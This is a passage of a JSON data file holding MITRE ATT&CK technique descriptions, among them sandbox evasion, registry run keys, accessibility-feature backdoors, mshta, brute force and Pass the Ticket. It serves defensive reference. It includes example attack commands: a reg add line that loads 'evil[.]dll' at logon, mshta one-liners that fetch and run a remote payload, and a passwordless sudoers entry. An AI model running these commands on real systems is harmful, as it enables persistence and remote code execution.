and/or the Registry. Adversaries may use [Scripting](https://attack.mitre.org/techniques/T1064) to combine these checks into one script and then have the program exit if it determines the system to be a virtual environment. Also, in applications like VMWare, adversaries can use a special I/O port to send commands and receive output. Adversaries may also check the drive size. For example, this can be done using the Win32 DeviceIOControl function. \n\nExample VME Artifacts in the Registry(Citation: McAfee Virtual Jan 2017)\n\n* HKLM\\SOFTWARE\\Oracle\\VirtualBox Guest Additions\n* HKLM\\HARDWARE\\Description\\System\\”SystemBiosVersion”;”VMWARE”\n* HKLM\\HARDWARE\\ACPI\\DSDT\\BOX_\n\nExample VME files and DLLs on the system(Citation: McAfee Virtual Jan 2017)\n\n* WINDOWS\\system32\\drivers\\vmmouse.sys \n* WINDOWS\\system32\\vboxhook.dll\n* Windows\\system32\\vboxdisp.dll\n\nCommon checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017)\n\n###User Activity Discovery###\n\nAdversaries may search for user activity on the host (e.g., browser history, cache, bookmarks, number of files in the home directories, etc.) for reassurance of an authentic environment. They might detect this type of information via user interaction and digital signatures. They may have malware check the speed and frequency of mouse clicks to determine if it’s a sandboxed environment.(Citation: Sans Virtual Jan 2016) Other methods may rely on specific user interaction with the system before the malicious code is activated. Examples include waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) and waiting for a user to double click on an embedded image to activate (Citation: FireEye FIN7 April 2017).\n\n###Virtual Hardware Fingerprinting Discovery###\n\nAdversaries may check the fan and temperature of the system to gather evidence that can be indicative a virtual environment. An adversary may perform a CPU check using a WMI query $q = “Select * from Win32_Fan” Get-WmiObject -Query $q. If the results of the WMI query return more than zero elements, this might tell them that the machine is a physical one. (Citation: Unit 42 OilRig Sept 2018)","tactics":["defense-evasion","discovery"],"externalId":"T1497","externalUrl":"https://attack.mitre.org/techniques/T1497"},"key":"mitre/virtualization-sandbox-evasion"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Web Service","version":"1.0","description":"Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system.\n\nThese commands may also include pointers to command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).","tactics":["command-and-control","defense-evasion"],"externalId":"T1102","externalUrl":"https://attack.mitre.org/techniques/T1102"},"key":"mitre/web-service"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Multi-Stage Channels","version":"1.0","description":"Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.\n\nRemote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.\n\nThe different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.","tactics":["command-and-control"],"externalId":"T1104","externalUrl":"https://attack.mitre.org/techniques/T1104"},"key":"mitre/multi-stage-channels"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Execution Guardrails","version":"1.0","description":"Execution guardrails constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. \n\nGuardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.\n\nEnvironmental keying is one type of guardrail that includes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents) Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use guardrails and environmental keying to help protect their TTPs and evade detection. For example, environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) In general, guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) where a decision can be made not to further engage because the value conditions specified by the adversary are meant to be target specific and not such that they could occur in any environment.","tactics":["defense-evasion"],"externalId":"T1480","externalUrl":"https://attack.mitre.org/techniques/T1480"},"key":"mitre/execution-guardrails"},{"type":"mitre","subtype":"technique","metadata":{"technique":"User Execution","version":"1.0","description":"An adversary may rely upon specific actions by a user in order to gain execution. This may be direct code execution, such as when a user opens a malicious executable delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) with the icon and apparent extension of a document file. It also may lead to other execution techniques, such as when a user clicks on a link delivered via [Spearphishing Link](https://attack.mitre.org/techniques/T1192) that leads to exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.","tactics":["execution"],"externalId":"T1204","externalUrl":"https://attack.mitre.org/techniques/T1204"},"key":"mitre/user-execution"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Control Panel Items","version":"1.0","description":"Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)\n\nFor ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)\n\nAdversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.","tactics":["defense-evasion","execution"],"externalId":"T1196","externalUrl":"https://attack.mitre.org/techniques/T1196"},"key":"mitre/control-panel-items"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Process Discovery","version":"1.0","description":"Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.\n\n### Windows\n\nAn example command that would obtain details on processes is \"tasklist\" using the [Tasklist](https://attack.mitre.org/software/S0057) utility.\n\n### Mac and Linux\n\nIn Mac and Linux, this is accomplished with the ps command.","tactics":["discovery"],"externalId":"T1057","externalUrl":"https://attack.mitre.org/techniques/T1057"},"key":"mitre/process-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Input Prompt","version":"2.0","description":"When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1088)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1155)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and [PowerShell](https://attack.mitre.org/techniques/T1086)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015).","tactics":["credential-access"],"externalId":"T1141","externalUrl":"https://attack.mitre.org/techniques/T1141"},"key":"mitre/input-prompt"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Third-party Software","version":"1.0","description":"Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code.\n\nAdversaries may gain access to and use third-party application deployment systems installed within an enterprise network. Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.\n\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.","tactics":["execution","lateral-movement"],"externalId":"T1072","externalUrl":"https://attack.mitre.org/techniques/T1072"},"key":"mitre/third-party-software"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Exfiltration Over Command and Control Channel","version":"1.0","description":"Data exfiltration is performed over the Command and Control channel. Data is encoded into the normal communications channel using the same protocol as command and control communications.","tactics":["exfiltration"],"externalId":"T1041","externalUrl":"https://attack.mitre.org/techniques/T1041"},"key":"mitre/exfiltration-over-command-and-control-channel"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Registry Run Keys / Startup Folder","version":"1.0","description":"Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nThe HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.","tactics":["persistence"],"externalId":"T1060","externalUrl":"https://attack.mitre.org/techniques/T1060"},"key":"mitre/registry-run-keys-startup-folder"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Shortcut Modification","version":"1.0","description":"Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.","tactics":["persistence"],"externalId":"T1023","externalUrl":"https://attack.mitre.org/techniques/T1023"},"key":"mitre/shortcut-modification"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Multiband Communication","version":"1.0","description":"Some adversaries may split communications between different protocols. There could be one protocol for inbound command and control and another for outbound data, allowing it to bypass certain firewall restrictions. The split could also be random to simply avoid data threshold alerts on any one communication.","tactics":["command-and-control"],"externalId":"T1026","externalUrl":"https://attack.mitre.org/techniques/T1026"},"key":"mitre/multiband-communication"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Component Object Model Hijacking","version":"1.0","description":"The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.","tactics":["defense-evasion","persistence"],"externalId":"T1122","externalUrl":"https://attack.mitre.org/techniques/T1122"},"key":"mitre/component-object-model-hijacking"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Accessibility Features","version":"1.0","description":"Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)\n\nDepending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods:\n\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nFor the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for the accessibility program (e.g., \"utilman.exe\"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the \"debugger\" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nOther accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)\n\n* On-Screen Keyboard: C:\\Windows\\System32\\osk.exe\n* Magnifier: C:\\Windows\\System32\\Magnify.exe\n* Narrator: C:\\Windows\\System32\\Narrator.exe\n* Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe\n* App Switcher: C:\\Windows\\System32\\AtBroker.exe","tactics":["persistence","privilege-escalation"],"externalId":"T1015","externalUrl":"https://attack.mitre.org/techniques/T1015"},"key":"mitre/accessibility-features"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Exploitation for Credential Access","version":"1.0","description":"Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions. (Citation: Technet MS14-068) (Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.","tactics":["credential-access"],"externalId":"T1212","externalUrl":"https://attack.mitre.org/techniques/T1212"},"key":"mitre/exploitation-for-credential-access"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Exploitation of Remote Services","version":"1.0","description":"Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities,  or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.","tactics":["lateral-movement"],"externalId":"T1210","externalUrl":"https://attack.mitre.org/techniques/T1210"},"key":"mitre/exploitation-of-remote-services"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Keychain","version":"1.0","description":"Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.\n\nTo manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.","tactics":["credential-access"],"externalId":"T1142","externalUrl":"https://attack.mitre.org/techniques/T1142"},"key":"mitre/keychain"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Sudo","version":"1.0","description":"The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). \n\nAdversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.","tactics":["privilege-escalation"],"externalId":"T1169","externalUrl":"https://attack.mitre.org/techniques/T1169"},"key":"mitre/sudo"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Trusted Relationship","version":"1.0","description":"Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.","tactics":["initial-access"],"externalId":"T1199","externalUrl":"https://attack.mitre.org/techniques/T1199"},"key":"mitre/trusted-relationship"},{"type":"mitre","subtype":"technique","metadata":{"technique":"LC_MAIN Hijacking","version":"1.0","description":"As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binary’s entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD  (Citation: Prolific OSX Malware History). The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesn’t know anything was different  (Citation: Methods of Mac Malware Persistence). By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.","tactics":["defense-evasion"],"externalId":"T1149","externalUrl":"https://attack.mitre.org/techniques/T1149"},"key":"mitre/lc-main-hijacking"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Account Manipulation","version":"1.0","description":"Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to subvert password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.","tactics":["credential-access","persistence"],"externalId":"T1098","externalUrl":"https://attack.mitre.org/techniques/T1098"},"key":"mitre/account-manipulation"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Mshta","version":"1.1","description":"Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nAdversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: GitHub SubTee The List)","tactics":["defense-evasion","execution"],"externalId":"T1170","externalUrl":"https://attack.mitre.org/techniques/T1170"},"key":"mitre/mshta"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Exfiltration Over Alternative Protocol","version":"1.0","description":"Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, or some other network protocol. Different channels could include Internet Web services such as cloud storage.","tactics":["exfiltration"],"externalId":"T1048","externalUrl":"https://attack.mitre.org/techniques/T1048"},"key":"mitre/exfiltration-over-alternative-protocol"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Pass the Ticket","version":"1.0","description":"Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\n\nIn this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access. (Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket)\n\nSilver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: ADSecurity AD Kerberos Attacks)\n\nGolden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014)","tactics":["lateral-movement"],"externalId":"T1097","externalUrl":"https://attack.mitre.org/techniques/T1097"},"key":"mitre/pass-the-ticket"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Graphical User Interface","version":"1.0","description":"The Graphical User Interfaces (GUI) is a common way to interact with an operating system. Adversaries may use a system's GUI during an operation, commonly through a remote interactive session such as [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076), instead of through a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), to search for information and execute files via mouse double-click events, the Windows Run command (Citation: Wikipedia Run Command), or other potentially difficult to monitor interactions.","tactics":["execution"],"externalId":"T1061","externalUrl":"https://attack.mitre.org/techniques/T1061"},"key":"mitre/graphical-user-interface"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Brute Force","version":"1.1","description":"Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.\n\n[Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking)\n\nAdversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)\n\nA related technique called password spraying uses one password (e.g. 'Password01'), or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)\n\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.","tactics":["credential-access"],"externalId":"T1110","externalUrl":"https://attack.mitre.org/techniques/T1110"},"key":"mitre/brute-force"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Dylib Hijacking","version":"1.0","description":"macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.\n\nA common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X)\n\nIf the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. This can be used by adversaries as a privilege escalation technique.","tactics":["persistence","privilege-escalation"],"externalId":"T1157","externalUrl":"https://attack.mitre.org/techniques/T1157"},"key":"mitre/dylib-hijacking"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Data Obfuscation","version":"1.0","description":"Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, commingling legitimate traffic with C2 communications traffic, or using a non-standard data encoding system, such as a modified Base64 encoding for the message body of an HTTP request.","tactics":["command-and-control"],"externalId":"T1001","externalUrl":"https://attack.mitre.org/techniques/T1001"},"key":"mitre/data-obfuscation"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Data from Network Shared Drive","version":"1.0","description":"Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration.\n\nAdversaries may search network shares on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.","tactics":["collection"],"externalId":"T1039","externalUrl":"https://attack.mitre.org/techniques/T1039"},"key":"mitre/data-from-network-shared-drive"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Valid Accounts","version":"1.1","description":"Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access. \n\nAccounts that an adversary may use can fall into three categories: default, local, and domain accounts. Default accounts are those that are built-into an OS such as Guest or Administrator account on Windows systems or default factory/provider set accounts on other types of systems, software, or devices. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. (Citation: Microsoft Local Accounts Feb 2019) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.\n\nCompromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their 